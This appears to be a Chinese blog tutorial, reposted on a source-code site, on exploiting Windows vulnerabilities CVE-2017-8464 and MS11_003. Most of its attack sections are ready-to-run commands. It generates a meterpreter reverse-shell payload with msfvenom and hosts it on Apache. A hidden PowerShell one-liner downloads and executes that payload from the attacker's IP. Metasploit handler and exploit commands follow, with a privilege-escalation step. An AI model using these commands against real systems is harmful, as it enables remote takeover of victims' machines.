目录
什么是组件1.CVE-2017-8464原理复现环境部署远程监听
2.MS11_003 溢出漏洞原理复现下一步提权
3.CVE-2019-07084.CVE-2020-0796(永恒之黑)5.…………………………
什么是组件
组件一般都是系统自带都有的, 如:WINXP
或WIN2000
它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。
具体方式:
控制面板--添加或删除程序--添加/删除组件
1.CVE-2017-8464
原理Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限
复现
环境部署msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=5555 -f psh-reflection>/opt/search.ps1 #生成shell反弹木马
mv search.ps1 /var/www/html #木马移动到/var/www/html
service apache2 start #启动服务
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1" #创建快捷件远程加载
远程监听use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.102
set lport 5555
exploit
2.MS11_003 溢出漏洞
原理溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。
根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。复现
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
下一步提权use post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit
3.CVE-2019-0708可参考:
https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.42424.CVE-2020-0796(永恒之黑)
https://blog.csdn.net/PigLL/article/details/108012981
5.…………………………
原创:https://www.panoramacn.com
源码网提供WordPress源码,帝国CMS源码discuz源码,微信小程序,小说源码,杰奇源码,thinkphp源码,ecshop模板源码,微擎模板源码,dede源码,织梦源码等。专业搭建小说网站,小说程序,杰奇系列,微信小说系列,app系列小说
免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。
您必须遵守我们的协议,如果您下载了该资源行为将被视为对《免责声明》全部内容的认可-> 联系客服 投诉资源www.panoramacn.com资源全部来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除。 敬请谅解! 侵权删帖/违法举报/投稿等事物联系邮箱:2640602276@qq.com未经允许不得转载:书荒源码源码网每日更新网站源码模板! » Windows系统组件漏洞
关注我们小说电影免费看关注我们,获取更多的全网素材资源,有趣有料!120000+人已关注
评论抢沙发